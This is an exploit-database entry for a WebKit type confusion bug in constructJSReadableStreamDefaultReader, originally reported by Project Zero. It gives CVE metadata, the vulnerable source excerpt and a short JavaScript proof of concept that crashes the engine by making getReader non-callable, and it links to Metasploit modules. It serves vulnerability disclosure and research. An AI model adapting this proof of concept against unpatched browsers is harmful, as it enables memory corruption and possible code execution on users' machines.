header-logo
Suggest Exploit
vendor:
Webkit
by:
Project Zero
8,8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: Webkit
Affected Version From: Webkit Nightly 10.0.2(12602.3.12.0.1, r210800)
Affected Version To: Webkit Nightly 10.0.2(12602.3.12.0.1, r210800)
Patch Exists: YES
Related CWE: CVE-2018-4233
CPE: a:apple:webkit
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-4233/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-4233/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2018-4233/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2018-4233/https://www.rapid7.com/db/vulnerabilities/apple-itunes-cve-2018-4233/https://www.rapid7.com/db/vulnerabilities/apple-safari-cve-2018-4233/https://www.rapid7.com/db/modules/exploit/apple_ios/browser/webkit_createthis/https://www.rapid7.com/db/modules/exploit/osx/browser/safari_proxy_object_type_confusion/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2018

EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader() Type Confusion Vulnerability

The constructJSReadableStreamDefaultReader() function in Webkit does not check whether the getReader() function is callable or not. This can be exploited by setting the getReader() function to an arbitrary value and then calling the constructor of the reader object with the ReadableStream object as an argument. This can lead to type confusion and arbitrary code execution.

Mitigation:

Upgrade to the latest version of Webkit Nightly
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1085

EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)
{
    VM& vm = exec.vm();
    auto scope = DECLARE_THROW_SCOPE(vm);

    JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));
    if (!stream)
        return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");

    JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1

    CallData callData;
    CallType callType = getCallData(jsFunction, callData);
    MarkedArgumentBuffer noArguments;
    return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));
}

It doesn't check whether |getReader| is callable or not.

PoC:
-->

let rs = new ReadableStream();
let cons = rs.getReader().constructor;

rs.getReader = 0x12345;
new cons(rs);

<!--
Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, r210800)
-->

Navigation

Suggest Exploit

Services By CQR